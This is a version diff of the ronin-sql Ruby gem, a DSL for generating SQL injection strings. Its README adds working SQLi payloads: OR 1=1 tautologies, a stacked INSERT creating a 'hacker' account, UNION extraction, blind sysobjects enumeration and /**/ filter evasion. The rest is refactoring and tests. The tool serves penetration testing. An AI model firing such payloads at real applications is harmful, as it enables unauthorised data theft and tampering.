ronin-sql 1.0.0 → 1.1.0

data/ChangeLog.md

@@ -1,3 +1,15 @@
+### 1.1.0 / 2013-01-22
+
+* Added {Ronin::SQL::InjectionExpr}, so that statements specified within
+  `and { }`, `or { }` blocks would not be appending to the
+  {Ronin::SQL::Injection} object.
+* Made {Ronin::SQL::Field} emittable.
+* Added {Ronin::SQL::Emitter#emit_argument}, so that any sub-statements will
+  be wrapped in `( )`.
+* Improved {Ronin::SQL::Emitter#emit_field}.
+* Fixed {Ronin::SQL::Emitter#emit} to pass {Ronin::SQL::Function}s to
+  {Ronin::SQL::Emitter#emit_function}.
+
 ### 1.0.0 / 2013-01-21
 
 * Require [Ruby] >= 1.9.1.

data/README.md

@@ -8,13 +8,13 @@
 
 ## Description
 
-{Ronin::SQL} is a Ruby DSL for crafting SQL Injections (SQLi).
+{Ronin::SQL} is a Ruby DSL for crafting [SQL Injections (SQLi)][SQLi].
 
 ### Features
 
 * Provides convenience methods for encoding/decoding SQL data.
 * Provides an Domain Specific Language (DSL) for crafting normal SQL and
-  SQL injections.
+  [SQL injections][SQLi].
 
 ## Examples
 
@@ -43,9 +43,16 @@ Hex decode a String:
 
 ### SQLi DSL
 
-Injecting a `1=1` test into a String value:
+Injecting a `1=1` test into a Integer comparison:
 
-    sqli = Ronin::SQL::Injection.new(:escape => :string)
+    sqli = Ronin::SQL::Injection.new
+    sqli.or { 1 == 1 }
+    puts sqli
+    # 1 OR 1=1
+
+Injecting a `1=1` test into a String comparison:
+
+    sqli = Ronin::SQL::Injection.new(escape: :string)
     sqli.or { string(1) == string(1) }
     puts sqli
     # 1' OR '1'='1
@@ -62,16 +69,69 @@ Clauses:
     sqli = Ronin::SQL::Injection.new
     sqli.or { 1 == 1 }.limit(0)
     puts sqli
-    # 1 AND admin=1
+    # 1 OR 1=1 LIMIT 0
 
 Statements:
 
+    sqli = Ronin::SQL::Injection.new
+    sqli.and { 1 == 0 }
+    sqli.insert.into(:users).values('hacker','passw0rd','t')
+    puts sqli
+    # 1 AND 1=0; INSERT INTO users VALUES ('hacker','passw0rd','t')
+
+Sub-Statements:
+
     sqli = Ronin::SQL::Injection.new
     sqli.union { select(1,2,3,4,id).from(users) }
     puts sqli
     # 1 UNION SELECT (1,2,3,4,id) FROM users
 
-Filter evasion:
+Test if a table exists:
+
+    sqli = Ronin::SQL::Injection.new
+    sqli.and { select(count).from(:users) == 1 }
+    puts sqli
+    # 1 AND (SELECT COUNT(*) FROM users)=1
+
+Create errors by using non-existant tables:
+
+    sqli = Ronin::SQL::Injection.new(escape: :string)
+    sqli.and { non_existant_table == '1' }
+    puts sqli
+    # 1' AND non_existant_table='1
+
+Dumping all values of a column:
+
+    sqli = Ronin::SQL::Injection.new(escape: :string)
+    sqli.or { username.is_not(null) }.or { username == '' }
+    puts sqli
+    # 1' OR username IS NOT NULL OR username='
+
+Enumerate through database table names:
+
+    sqli = Ronin::SQL::Injection.new
+    sqli.and {
+      ascii(
+        lower(
+          substring(
+            select(:name).top(1).from(sysobjects).where { xtype == 'U' }, 1, 1
+          )
+        )
+      ) > 116
+    }
+    puts sqli
+    # 1 AND ASCII(LOWER(SUBSTRING((SELECT name TOP 1 FROM sysobjects WHERE xtype='U'),1,1)))>116
+
+Find user supplied tables via the `sysObjects` table:
+
+    sqli = Ronin::SQL::Injection.new
+    sqli.union_all {
+      select(1,2,3,4,5,6,name).from(sysObjects).where { xtype == 'U' }
+    }
+    puts sqli.to_sql(:terminate => true)
+    # 1 UNION ALL (SELECT (1,2,3,4,5,6,name) FROM sysObjects WHERE xtype='U');--
+
+Bypass filters using `/**/` instead of spaces:
 
     sqli = Ronin::SQL::Injection.new
     sqli.union { select(1,2,3,4,id).from(users) }
@@ -107,4 +167,6 @@ GNU General Public License for more details.
 You should have received a copy of the GNU General Public License
 along with Ronin Asm.  If not, see <http://www.gnu.org/licenses/>.
 
+[SQLi]: http://en.wikipedia.org/wiki/SQL_injection
+
 [Ruby]: http://www.ruby-lang.org

data/lib/ronin/sql/binary_expr.rb

@@ -28,6 +28,8 @@ module Ronin
     #
     # Represents a binary expression in SQL.
     #
+    # @api semipublic
+    #
     class BinaryExpr < Struct.new(:left,:operator,:right)
 
       include Operators

data/lib/ronin/sql/clause.rb

@@ -32,6 +32,8 @@ module Ronin
     #
     # Represents a SQL Clause.
     #
+    # @api semipublic
+    #
     class Clause < Struct.new(:keyword,:argument)
 
       include Literals

data/lib/ronin/sql/clauses.rb

@@ -25,6 +25,8 @@ module Ronin
     #
     # Methods for creating common SQL {Clause Clauses}.
     #
+    # @api public
+    #
     module Clauses
       #
       # The defined clauses of the statement.
@@ -170,6 +172,17 @@ module Ronin
         clause(:UNION,&block)
       end
 
+      #
+      # Appends a `UNION ALL` clause.
+      #
+      # @return [self]
+      #
+      # @since 1.1.0
+      #
+      def union_all(&block)
+        clause([:UNION, :ALL],&block)
+      end
+
       #
       # Appends a `GROUP BY` clause.
       #

data/lib/ronin/sql/emittable.rb

@@ -27,12 +27,16 @@ module Ronin
     #
     # Allows an object to be converted to raw SQL.
     #
+    # @api public
+    #
     module Emittable
       #
       # Creates a new emitter.
       #
       # @param [Hash] options
       #   Additional options for {Emitter#initialize}.
+      #
+      # @api private
       #   
       def emitter(options={})
         Emitter.new(options)

data/lib/ronin/sql/emitter.rb

@@ -27,6 +27,8 @@ module Ronin
     #
     # Generates raw SQL.
     #
+    # @api private
+    #
     class Emitter
 
       # The case to use when emitting keywords
@@ -89,18 +91,16 @@ module Ronin
       #
       # Emits a SQL operator.
       #
-      # @param [Symbol] op
+      # @param [Array<Symbol>, Symbol] op
       #   The operator symbol.
       #
       # @return [String]
       #   The raw SQL.
       #
       def emit_operator(op)
-        op = op.to_s
-
         case op
-        when /^[a-zA-Z]+$/ then emit_keyword(op)
-        else                    op
+        when /^\W+$/          then op.to_s
+        else                       emit_keyword(op)
         end
       end
 
@@ -182,7 +182,13 @@ module Ronin
       #   The raw SQL.
       #
       def emit_field(field)
-        field.to_s
+        name = emit_keyword(field.name)
+
+        if field.parent
+          name = "#{emit_field(field.parent)}.#{name}"
+        end
+
+        return name
       end
 
       #
@@ -213,6 +219,24 @@ module Ronin
         }.join(',')
       end
 
+      #
+      # Emits a value used in an expression.
+      #
+      # @param [Statement, #to_sql] operand
+      #   The operand to emit.
+      #
+      # @return [String]
+      #   The raw SQL.
+      #
+      # @since 1.1.0
+      #
+      def emit_argument(operand)
+        case operand
+        when Statement then "(#{emit_statement(operand)})"
+        else                emit(operand)
+        end
+      end
+
       #
       # Emits a SQL expression.
       #
@@ -227,22 +251,18 @@ module Ronin
 
         case expr
         when BinaryExpr
-          left, right = emit(expr.left), emit(expr.right)
-
-          left  = "(#{left})"  if expr.left.kind_of?(Statement)
-          right = "(#{right})" if expr.right.kind_of?(Statement)
+          left, right = emit_argument(expr.left), emit_argument(expr.right)
 
           case op
-          when /^\w+$/ then [left, op, right].join(@space)
-          else              "#{left}#{op}#{right}"
+          when /^\W+$/ then "#{left}#{op}#{right}"
+          else              [left, op, right].join(@space)
           end
         when UnaryExpr
-          operand = emit(expr.operand)
-          operand = "(#{operand})" if expr.operand.kind_of?(Statement)
+          operand = emit_argument(expr.operand)
 
-          case op
-          when /^\w+$/ then [op, operand].join(@space)
-          else              "#{op}#{operand}"
+          case expr.operator
+          when /^\W+$/ then "#{op}#{operand}"
+          else              [op, operand].join(@space)
           end
         end
       end
@@ -258,7 +278,7 @@ module Ronin
       #
       def emit_function(function)
         name      = emit_keyword(function.name)
-        arguments = function.arguments.map { |argument| emit(argument) }
+        arguments = function.arguments.map { |value| emit_argument(value) }
 
         return "#{name}(#{arguments.join(',')})"
       end
@@ -284,10 +304,12 @@ module Ronin
         when Float                 then emit_decimal(object)
         when String                then emit_string(object)
         when Literal               then emit(object.value)
-        when Field, Symbol         then emit_field(object)
+        when Symbol                then emit_keyword(object)
+        when Field                 then emit_field(object)
         when Array                 then emit_list(object)
         when Hash                  then emit_assignments(object)
         when BinaryExpr, UnaryExpr then emit_expression(object)
+        when Function              then emit_function(object)
         when Clause                then emit_clause(object)
         when Statement             then emit_statement(object)
         when StatementList         then emit_statement_list(object)
@@ -313,7 +335,7 @@ module Ronin
         sql = emit_keyword(clause.keyword)
 
         unless clause.argument.nil?
-          sql << @space << emit(clause.argument)
+          sql << @space << emit_argument(clause.argument)
         end
 
         return sql
@@ -345,7 +367,16 @@ module Ronin
         sql = emit_keyword(stmt.keyword)
 
         unless stmt.argument.nil?
-          sql << @space << emit(stmt.argument)
+          case stmt.argument
+          when Array
+            sql << @space << if stmt.argument.length == 1
+                               emit_argument(stmt.argument[0])
+                             else
+                               emit_list(stmt.argument)
+                             end
+          else
+            sql << @space << emit_argument(stmt.argument)
+          end
         end
 
         unless stmt.clauses.empty?

data/lib/ronin/sql/field.rb

@@ -21,15 +21,19 @@
 #
 
 require 'ronin/sql/operators'
+require 'ronin/sql/emittable'
 
 module Ronin
   module SQL
     #
     # Represents a SQL column, table or database name.
     #
+    # @api semipublic
+    #
     class Field < Struct.new(:name,:parent)
 
       include Operators
+      include Emittable
 
       #
       # Initializes the new field.
@@ -61,18 +65,6 @@ module Ronin
         return field
       end
 
-      #
-      # Converts the field to a String.
-      #
-      # @return [String]
-      #   The full field name.
-      #
-      def to_s
-        if parent then "#{parent}.#{name}"
-        else           name.to_s
-        end
-      end
-
       alias to_str to_s
 
       protected

data/lib/ronin/sql/fields.rb

@@ -27,6 +27,8 @@ module Ronin
     #
     # Allows creating {Field Fields} via {#method_missing}.
     #
+    # @api public
+    #
     module Fields
       #
       # @return [true]

data/lib/ronin/sql/function.rb

@@ -28,6 +28,8 @@ module Ronin
     #
     # Represents a SQL function call.
     #
+    # @api semipublic
+    #
     class Function < Struct.new(:name,:arguments)
 
       include Operators

data/lib/ronin/sql/functions.rb

@@ -27,6 +27,8 @@ module Ronin
     #
     # Methods for creating common SQL {Function Functions}.
     #
+    # @api public
+    #
     module Functions
       #
       # @!group Aggregate Functions

data/lib/ronin/sql/injection.rb

@@ -20,9 +20,9 @@
 # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 #
 
-require 'ronin/sql/binary_expr'
 require 'ronin/sql/literals'
 require 'ronin/sql/clauses'
+require 'ronin/sql/injection_expr'
 require 'ronin/sql/statement_list'
 
 module Ronin
@@ -30,6 +30,10 @@ module Ronin
     #
     # Represents a SQL injection (SQLi).
     #
+    # @api public
+    #
+    # @see http://en.wikipedia.org/wiki/SQL_injection
+    #
     class Injection < StatementList
 
       include Literals
@@ -47,9 +51,6 @@ module Ronin
       # The type of element to escape out of
       attr_reader :escape
 
-      # The place holder data
-      attr_reader :place_holder
-
       # The expression that will be injected
       attr_reader :expression
 
@@ -78,11 +79,12 @@ module Ronin
       #
       def initialize(options={},&block)
         @escape       = options.fetch(:escape,:integer)
-        @place_holder = options.fetch(:place_holder) do
+
+        place_holder = options.fetch(:place_holder) do
           PLACE_HOLDERS.fetch(@escape)
         end
 
-        @expression = @place_holder
+        @expression = InjectionExpr.new(place_holder)
 
         super(&block)
       end
@@ -90,44 +92,34 @@ module Ronin
       #
       # Appends an `AND` expression to the injection.
       #
-      # @yield [(injection)]
+      # @yield [(expr)]
       #   The return value of the block will be used as the right-hand side
       #   operand.  If the block accepts an argument, it will be called with
       #   the injection.
       #
-      # @yieldparam [Injection] injection
+      # @yieldparam [InjectionExpr] expr
       #
       # @return [self]
       #
       def and(&block)
-        value = case block.arity
-                when 0 then instance_eval(&block)
-                else        block.call(self)
-                end
-
-        @expression = BinaryExpr.new(@expression,:AND,value)
+        @expression.and(&block)
         return self
       end
 
       #
       # Appends an `OR` expression to the injection.
       #
-      # @yield [(injection)]
+      # @yield [(expr)]
       #   The return value of the block will be used as the right-hand side
       #   operand. If the block accepts an argument, it will be called with
-      #   the injection.
+      #   the injection expression.
       #
-      # @yieldparam [Injection] injection
+      # @yieldparam [InjectionExp] expr
       #
       # @return [self]
       #
       def or(&block)
-        value = case block.arity
-                when 0 then instance_eval(&block)
-                else        block.call(self)
-                end
-
-        @expression = BinaryExpr.new(@expression,:OR,value)
+        @expression.or(&block)
         return self
       end
 
@@ -145,9 +137,7 @@ module Ronin
       #
       def to_sql(options={})
         emitter = emitter(options)
-        sql     = ''
-
-        sql << emitter.emit(@expression)
+        sql     = @expression.to_sql(options)
 
         unless clauses.empty?
           sql << emitter.space << emitter.emit_clauses(clauses)

data/lib/ronin/sql/injection_expr.rb

@@ -0,0 +1,113 @@
+#
+# Ronin SQL - A Ruby DSL for crafting SQL Injections.
+#
+# Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This file is part of Ronin SQL.
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+#
+
+require 'ronin/sql/binary_expr'
+require 'ronin/sql/literals'
+require 'ronin/sql/fields'
+require 'ronin/sql/functions'
+require 'ronin/sql/statements'
+require 'ronin/sql/emittable'
+
+module Ronin
+  module SQL
+    #
+    # @api private
+    #
+    # @since 1.1.0
+    #
+    class InjectionExpr
+
+      include Literals
+      include Fields
+      include Functions
+      include Statements
+      include Emittable
+
+      # The expression that will be injected
+      attr_reader :expression
+
+      #
+      # Initializes the new expression to inject.
+      #
+      # @param [String, Integer, Float, Array, Symbol] initial_value
+      #   The initial value for the expression.
+      #
+      def initialize(initial_value)
+        @expression = initial_value
+      end
+
+      #
+      # Appends an `AND` expression to the injection.
+      #
+      # @yield [(self)]
+      #   The return value of the block will be used as the right-hand side
+      #   operand.  If the block accepts an argument, it will be called with
+      #   the injection expression.
+      #
+      # @return [self]
+      #
+      def and(&block)
+        value = case block.arity
+                when 0 then instance_eval(&block)
+                else        block.call(self)
+                end
+
+        @expression = BinaryExpr.new(@expression,:AND,value)
+        return self
+      end
+
+      #
+      # Appends an `OR` expression to the injection.
+      #
+      # @yield [(self)]
+      #   The return value of the block will be used as the right-hand side
+      #   operand. If the block accepts an argument, it will be called with
+      #   the injection expression.
+      #
+      # @return [self]
+      #
+      def or(&block)
+        value = case block.arity
+                when 0 then instance_eval(&block)
+                else        block.call(self)
+                end
+
+        @expression = BinaryExpr.new(@expression,:OR,value)
+        return self
+      end
+
+      #
+      # Emits the injection expression.
+      #
+      # @param [Hash] options
+      #   Additional options for {Emitter#initialize}.
+      #
+      # @return [String]
+      #   The raw SQL.
+      #
+      def to_sql(options={})
+        emitter(options).emit(@expression)
+      end
+
+    end
+  end
+end

data/lib/ronin/sql/literal.rb

@@ -28,6 +28,8 @@ module Ronin
     #
     # Represents SQL literals.
     #
+    # @api semipublic
+    #
     class Literal < Struct.new(:value)
 
       include Operators

data/lib/ronin/sql/literals.rb

@@ -27,6 +27,8 @@ module Ronin
     #
     # Methods for creating SQL {Literals Literal}.
     #
+    # @api public
+    #
     module Literals
       #
       # Creates a `NULL` literal.

data/lib/ronin/sql/operators.rb

@@ -25,6 +25,8 @@ module Ronin
     #
     # Methods for creating SQL expressions.
     #
+    # @api public
+    #
     # @see http://sqlite.org/lang_expr.html
     #
     module Operators
@@ -205,7 +207,7 @@ module Ronin
       #   The new binary expression.
       #
       def is_not(other)
-        BinaryExpr.new(self,:"IS NOT",other)
+        BinaryExpr.new(self,[:IS, :NOT],other)
       end
 
       #

data/lib/ronin/sql/sql.rb

@@ -24,6 +24,12 @@ require 'ronin/sql/statement_list'
 require 'ronin/sql/injection'
 
 module Ronin
+  #
+  # Provides a Domain Specific Language (DSL) for crafting complex
+  # {StatementList SQL} and SQL {Injection Injections} (SQLi).
+  #
+  # @see http://en.wikipedia.org/wiki/SQL_injection
+  #
   module SQL
 
     #
@@ -44,6 +50,8 @@ module Ronin
     #   sql { select(1,2,3,4,id).from(users) }
     #   # => #<Ronin::SQL::StatementList: SELECT (1,2,3,4,id) FROM users>
     #
+    # @api public
+    #
     def sql(&block)
       StatementList.new(&block)
     end
@@ -78,6 +86,8 @@ module Ronin
     #   sqli { self.and { 1 == 1 }.select(1,2,3,4,id).from(users) }
     #   # => #<Ronin::SQL::Injection: 1 AND 1=1; SELECT (1,2,3,4,id) FROM users; SELECT (1,2,3,4,id) FROM users>
     #
+    # @api public
+    #
     def sqli(options={},&block)
       Injection.new(options,&block)
     end

data/lib/ronin/sql/statement.rb

@@ -31,6 +31,8 @@ module Ronin
     #
     # Represents a SQL Statement.
     #
+    # @api semipublic
+    #
     class Statement < Struct.new(:keyword,:argument)
 
       include Literals

data/lib/ronin/sql/statement_list.rb

@@ -34,6 +34,8 @@ module Ronin
     #
     # Represents a list of SQL {Statements Statement}.
     #
+    # @api public
+    #
     class StatementList
 
       include Fields

data/lib/ronin/sql/statements.rb

@@ -25,6 +25,8 @@ module Ronin
     #
     # Methods for creating common SQL {Statement Statements}.
     #
+    # @api public
+    #
     module Statements
       #
       # Creates an arbitrary statement.

data/lib/ronin/sql/unary_expr.rb

@@ -25,7 +25,9 @@ require 'ronin/sql/emittable'
 module Ronin
   module SQL
     #
-    # Represents a unary-expression in SQL.
+    # Represents a unary expression in SQL.
+    #
+    # @api semipublic
     #
     class UnaryExpr < Struct.new(:operator,:operand)
 

data/lib/ronin/sql/version.rb

@@ -23,6 +23,6 @@
 module Ronin
   module SQL
     # Ronin SQL version
-    VERSION = '1.0.0'
+    VERSION = '1.1.0'
   end
 end

data/spec/sql/clauses_spec.rb

@@ -29,6 +29,9 @@ describe SQL::Clauses do
   include_examples "Clause", :full_join, [:FULL, :JOIN], :table
   include_examples "Clause", :on, :ON, proc { id == 1 }
   include_examples "Clause", :union, :UNION, proc { select(:*).from(:table) }
+  include_examples "Clause", :union_all, [:UNION, :ALL], proc {
+                               select(:*).from(:table)
+                             }
   include_examples "Clause", :group_by, [:GROUP, :BY], [:column1, :column2]
   include_examples "Clause", :having, :HAVING, proc { max(priv) > 100 }
   include_examples "Clause", :limit, :LIMIT, 100

data/spec/sql/emitter_spec.rb

@@ -74,17 +74,17 @@ describe SQL::Emitter do
   end
 
   describe "#emit_operator" do
-    context "when the operator is upper-case alphabetic text" do
-      subject { described_class.new(case: :lower) }
-
-      it "should emit a keyword" do
-        subject.emit_operator(:AS).should == 'as'
+    context "when the operator is a symbol" do
+      it "should emit a String" do
+        subject.emit_operator(:"!=").should == '!='
       end
     end
 
     context "otherwise" do
-      it "should emit a String" do
-        subject.emit_operator(:"!=").should == '!='
+      subject { described_class.new(case: :lower) }
+
+      it "should emit a keyword" do
+        subject.emit_operator(:AS).should == 'as'
       end
     end
   end
@@ -134,8 +134,21 @@ describe SQL::Emitter do
   end
 
   describe "#emit_field" do
-    it "should emit a String" do
-      subject.emit_field(:id).should == 'id'
+    subject { described_class.new(case: :upper) }
+
+    let(:field) { SQL::Field.new(:id) }
+
+    it "should emit the name as a keyword" do
+      subject.emit_field(field).should == 'ID'
+    end
+
+    context "when the field has a parent" do
+      let(:parent) { SQL::Field.new(:users)     }
+      let(:field)  { SQL::Field.new(:id,parent) }
+
+      it "should emit the parent then the field name" do
+        subject.emit_field(field).should == 'USERS.ID'
+      end
     end
   end
 
@@ -153,6 +166,24 @@ describe SQL::Emitter do
     end
   end
 
+  describe "#emit_argument" do
+    context "when the value is a Statement" do
+      let(:stmt) { SQL::Statement.new(:SELECT,1) }
+
+      it "should wrap the statement in ( )" do
+        subject.emit_argument(stmt).should == '(SELECT 1)'
+      end
+    end
+
+    context "otherwise" do
+      let(:value) { 'hello' }
+
+      it "should emit the value" do
+        subject.emit_argument(value).should == "'hello'"
+      end
+    end
+  end
+
   describe "#emit_expression" do
     context "when the expression is a BinaryExpr" do
       context "when the operator is alphabetic" do
@@ -161,7 +192,7 @@ describe SQL::Emitter do
         let(:expr) { SQL::BinaryExpr.new(:id,:is,1) }
 
         it "should emit the operands and operator as a keyword with spaces" do
-          subject.emit_expression(expr).should == 'id IS 1'
+          subject.emit_expression(expr).should == 'ID IS 1'
         end
       end
 
@@ -327,6 +358,14 @@ describe SQL::Emitter do
       end
     end
 
+    context "when passed a Function" do
+      let(:func) { SQL::Function.new(:MAX,1,2) }
+
+      it "should emit the function" do
+        subject.emit(func).should == 'MAX(1,2)'
+      end
+    end
+
     context "when passed a Statment" do
       let(:stmt) { SQL::Statement.new(:SELECT,1) }
 
@@ -423,6 +462,22 @@ describe SQL::Emitter do
         subject.emit_statement(stmt).should == 'select 1'
       end
 
+      context "when the argument is an Array" do
+        let(:stmt) { SQL::Statement.new(:SELECT,[1,2,3]) }
+
+        it "should emit a list" do
+          subject.emit_statement(stmt).should == 'select (1,2,3)'
+        end
+
+        context "with only one element" do
+          let(:stmt) { SQL::Statement.new(:SELECT,[1]) }
+
+          it "should emit the element" do
+            subject.emit_statement(stmt).should == 'select 1'
+          end
+        end
+      end
+
       context "with custom :space" do
         subject { described_class.new(case: :lower, space: '/**/') }
 

data/spec/sql/injection_expr_spec.rb

@@ -0,0 +1,98 @@
+require 'spec_helper'
+require 'ronin/sql/injection_expr'
+
+describe SQL::InjectionExpr do
+  let(:initial_value) { 1 }
+
+  subject { described_class.new(initial_value) }
+
+  describe "#and" do
+    context "on first call" do
+      before { subject.and { 1 } }
+
+      it "should create a 'AND' BinaryExpr" do
+        subject.expression.operator.should == :AND
+      end
+
+      it "should create an expression with the initial value" do
+        subject.expression.left.should == initial_value
+      end
+
+      it "should create an expression with the expression" do
+        subject.expression.right.should == 1
+      end
+    end
+
+    context "on multiple calls" do
+      before { subject.and { 1 }.and { 2 } }
+
+      it "should create another 'AND' BinaryExpr" do
+        subject.expression.operator.should == :AND
+      end
+
+      it "should nest the expressions" do
+        subject.expression.left.right.should == 1
+        subject.expression.right.should == 2
+      end
+    end
+  end
+
+  describe "#or" do
+    context "on first call" do
+      before { subject.or { 1 } }
+
+      it "should create a 'OR' BinaryExpr" do
+        subject.expression.operator.should == :OR
+      end
+
+      it "should create an expression with the initial value" do
+        subject.expression.left.should == initial_value
+      end
+
+      it "should create an expression with the expression" do
+        subject.expression.right.should == 1
+      end
+    end
+
+    context "on multiple calls" do
+      before { subject.or { 1 }.or { 2 } }
+
+      it "should create another 'OR' BinaryExpr" do
+        subject.expression.operator.should == :OR
+      end
+
+      it "should nest the expressions" do
+        subject.expression.left.right.should == 1
+        subject.expression.right.should == 2
+      end
+    end
+  end
+
+  describe "#to_sql" do
+    context "without additional expressions" do
+      subject { described_class.new(1) }
+
+      it "should still emit the initial value" do
+        subject.to_sql.should == '1'
+      end
+    end
+
+    context "with an additional expression" do
+      subject do
+        sqli = described_class.new(1)
+        sqli.or { 1 == 1 }
+        sqli
+      end
+
+      it "should emit the expression" do
+        subject.to_sql.should == '1 OR 1=1'
+      end
+
+      context "when given emitter options" do
+        it "should accept additional options" do
+          subject.to_sql(case: :lower).should == '1 or 1=1'
+        end
+      end
+    end
+  end
+end

data/spec/sql/injection_spec.rb

@@ -36,8 +36,9 @@ describe SQL::Injection do
 
       subject { described_class.new(:place_holder => data) }
 
-      its(:place_holder) { should == data }
-      its(:expression)   { should == data }
+      it "should pass it to the InjectionExpr" do
+        subject.expression.expression.should == data
+      end
     end
 
     context "when a block is given" do
@@ -49,68 +50,6 @@ describe SQL::Injection do
     end
   end
 
-  describe "#and" do
-    context "on first call" do
-      before { subject.and { 1 } }
-
-      it "should create a 'AND' BinaryExpr" do
-        subject.expression.operator.should == :AND
-      end
-
-      it "should create an expression with the place-holder" do
-        subject.expression.left.should == subject.place_holder
-      end
-
-      it "should create an expression with the expression" do
-        subject.expression.right.should == 1
-      end
-    end
-
-    context "on multiple calls" do
-      before { subject.and { 1 }.and { 2 } }
-
-      it "should create another 'AND' BinaryExpr" do
-        subject.expression.operator.should == :AND
-      end
-
-      it "should nest the expressions" do
-        subject.expression.left.right.should == 1
-        subject.expression.right.should == 2
-      end
-    end
-  end
-
-  describe "#or" do
-    context "on first call" do
-      before { subject.or { 1 } }
-
-      it "should create a 'OR' BinaryExpr" do
-        subject.expression.operator.should == :OR
-      end
-
-      it "should create an expression with the place-holder" do
-        subject.expression.left.should == subject.place_holder
-      end
-
-      it "should create an expression with the expression" do
-        subject.expression.right.should == 1
-      end
-    end
-
-    context "on multiple calls" do
-      before { subject.or { 1 }.or { 2 } }
-
-      it "should create another 'OR' BinaryExpr" do
-        subject.expression.operator.should == :OR
-      end
-
-      it "should nest the expressions" do
-        subject.expression.left.right.should == 1
-        subject.expression.right.should == 2
-      end
-    end
-  end
-
   describe "#to_sql" do
     context "without an expression" do
       subject { described_class.new(place_holder: 1) }

data/spec/sql/operators_spec.rb

@@ -25,7 +25,7 @@ describe SQL::Operators do
   include_examples "BinaryExpr", :!=
   include_examples "BinaryExpr", :as, :AS
   include_examples "BinaryExpr", :is, :IS
-  include_examples "BinaryExpr", :is_not, :"IS NOT"
+  include_examples "BinaryExpr", :is_not, [:IS, :NOT]
   include_examples "BinaryExpr", :like, :LIKE
   include_examples "BinaryExpr", :glob, :GLOB
   include_examples "BinaryExpr", :match, :MATCH

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: ronin-sql
 version: !ruby/object:Gem::Version
-  version: 1.0.0
+  version: 1.1.0
   prerelease: 
 platform: ruby
 authors:
@@ -9,7 +9,7 @@ authors:
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2013-01-21 00:00:00.000000000 Z
+date: 2013-01-22 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: bundler
@@ -78,6 +78,7 @@ files:
 - lib/ronin/sql/function.rb
 - lib/ronin/sql/functions.rb
 - lib/ronin/sql/injection.rb
+- lib/ronin/sql/injection_expr.rb
 - lib/ronin/sql/literal.rb
 - lib/ronin/sql/literals.rb
 - lib/ronin/sql/operators.rb
@@ -102,6 +103,7 @@ files:
 - spec/sql/function_examples.rb
 - spec/sql/function_spec.rb
 - spec/sql/functions_spec.rb
+- spec/sql/injection_expr_spec.rb
 - spec/sql/injection_spec.rb
 - spec/sql/literal_spec.rb
 - spec/sql/literals_spec.rb